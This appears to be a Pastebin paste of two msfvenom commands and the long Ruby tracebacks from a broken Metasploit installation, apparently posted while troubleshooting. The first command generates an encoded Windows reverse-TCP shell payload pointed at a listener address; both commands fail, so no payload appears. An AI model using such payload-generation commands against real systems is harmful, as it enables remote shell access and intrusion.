Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.0.90 lport=1234 -e x86/unicode_mixed -b 'x00x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff' BufferRegister=EAX -f python
- Traceback (most recent call last):
- 25: from /usr/bin/msfvenom:339:in `<main>'
- 24: from /usr/bin/msfvenom:55:in `framework'
- 23: from /usr/bin/msfvenom:46:in `init_framework'
- 22: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
- 21: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
- 20: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
- 19: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
- 18: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
- 17: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
- 16: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
- 15: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
- 14: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
- 13: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
- 12: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
- 11: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
- 10: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
- 9: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
- 8: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
- 7: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
- 6: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
- 5: from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
- 4: from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
- 3: from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:48:in `generate_jar'
- 2: from /usr/share/metasploit-framework/lib/msf/core/payload/uuid/options.rb:46:in `generate_uri_uuid_mode'
- 1: from /usr/share/metasploit-framework/lib/rex/payloads/meterpreter/uri_checksum.rb:70:in `generate_uri_uuid'
- /usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in `to_uri': undefined method `encode_base64url' for Rex::Text:Module (NoMethodError)
- msfvenom -p windows/meterpreter/reverse_tcp --payload-options
- raceback (most recent call last):
- 36: from /usr/bin/msfvenom:321:in `<main>'
- 35: from /usr/bin/msfvenom:55:in `framework'
- 34: from /usr/bin/msfvenom:46:in `init_framework'
- 33: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
- 32: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
- 31: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
- 30: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
- 29: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
- 28: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
- 27: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
- 26: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
- 25: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
- 24: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
- 23: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
- 22: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:237:in `load_modules'
- 21: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:30:in `each_module_reference_name'
- 20: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:30:in `foreach'
- 19: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:40:in `block in each_module_reference_name'
- 18: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in `find'
- 17: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in `catch'
- 16: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:133:in `block in find'
- 15: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:50:in `block (2 levels) in each_module_reference_name'
- 14: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:238:in `block in load_modules'
- 13: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:183:in `load_module'
- 12: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:73:in `on_module_load'
- 11: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:198:in `add_module'
- 10: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:198:in `new'
- 9: from /usr/share/metasploit-framework/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb:34:in `initialize'
- 8: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `require'
- 7: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:240:in `load_dependency'
- 6: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `block in require'
- 5: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require_with_backports'
- 4: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require'
- 3: from /usr/share/metasploit-framework/lib/msf/core/opt.rb:3:in `<top (required)>'
- 2: from /usr/share/metasploit-framework/lib/msf/core/opt.rb:16:in `<module:Msf>'
- 1: from /usr/share/metasploit-framework/lib/msf/core/opt.rb:111:in `<module:Opt>'
Add Comment
Please, Sign In to add comment